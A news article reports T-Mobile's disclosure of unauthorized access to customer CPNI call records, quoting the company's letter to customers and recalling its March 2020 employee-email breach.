“Our Cybersecurity team recently discovered and shut down malicious, unauthorized access to some information related to your T-Mobile account,” said Matt Staneff, the Chief Marketing Officer of T-Mobile USA.

“We immediately started an investigation, with assistance from leading cybersecurity forensics experts, to determine what happened and what information was involved. We also immediately reported this matter to federal law enforcement and are now in the process of notifying impacted customers.”

What happened?

In a letter to customers, Staneff said T-Mobile’s cybersecurity team detected -- then shut down -- “malicious, unauthorized access” to “some” information related to T-Mobile accounts. Staneff qualified “some” as customer proprietary network information (CPNI). Collecting CPNI data is a permission given to phone companies by the Federal Communications Commission (FCC) and typically includes call information like the date, duration of the call, the phone number called, and the type of network a consumer subscribes to -- in short, the type of information that appears on a customer's phone bill.

T-Mobile users weren’t so lucky in March 2020 when a data breach allowed hackers to gain access to T-Mobile employee email accounts. That, in turn, opened up access to customers’ names, addresses, Social Security numbers, financial account information, phone numbers, billing and account information, and rate plans. 

T-Mobile offers to answer any questions

Staneff said the company is ready to answer additional questions if a customer wants further details. Customers can either contact the company online, ask questions at one of the company’s stores, or go through the customer service team at 1-800-937-8997. 

“We are sorry for any inconvenience this may cause you. We take the security of customer information seriously and, while we have a number of safeguards in place to protect customer information from unauthorized access, we will continue to work to further enhance security so we can mitigate this type of activity,” Staneff promised.